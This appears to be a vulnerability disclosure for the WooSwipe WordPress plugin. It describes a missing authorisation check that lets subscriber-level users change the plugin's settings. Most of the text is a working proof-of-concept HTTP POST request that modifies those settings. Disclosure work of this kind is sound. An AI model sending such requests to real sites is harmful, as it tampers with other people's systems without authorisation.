The plugin does not have any authorisation when updating its settings, which could allow any authenticated users, such as subscriber to update them
POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1848431393440185984976916911
Content-Length: 565
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="white_theme"
checkbox
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_bg_color"
#000000
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_stroke_color"
#ffffff
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="wooswipe_save"
Save Changes
-----------------------------1848431393440185984976916911--
Even though the response will be a 403, the settings will be updated